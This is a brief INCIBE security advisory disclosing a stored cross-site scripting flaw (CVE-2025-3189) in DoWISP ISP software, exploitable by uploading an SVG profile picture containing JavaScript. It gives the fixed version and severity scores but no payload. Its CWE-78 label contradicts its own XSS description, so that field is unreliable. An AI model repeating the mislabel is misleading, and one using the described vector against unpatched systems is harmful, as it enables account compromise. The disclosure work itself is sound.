Stored Cross-Site Scripting (XSS) in DoWISP

Posted date 03/04/2025
Identificador
INCIBE-2025-0169
Importance
3 - Medium
Affected Resources

DoWISP, versions prior to 1.16.2.50.

Description

INCIBE has coordinated the publication of a medium severity vulnerability affecting DoWISP, an all-in-one software for ISP providers, which has been discovered by David Padilla Alvarado.

This vulnerability has been assigned the following code, CVSS v4.0 base score, CVSS vector and vulnerability type CWE:

  • CVE-2025-3189: CVSS v4.0: 4.8 | CVSS AV:N/AC:L/AT:N/PR:H/UI:P/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N | CWE-78
Solution

The vulnerability has been fixed by the DoWISP team in version 1.16.2.50.

Detail

CVE-2025-3189: Stored Cross-Site Scripting (XSS) in DoWISP in versions prior to 1.16.2.50, which consists of an stored XSS through the upload of a profile picture in SVG format with malicious Javascript code in it.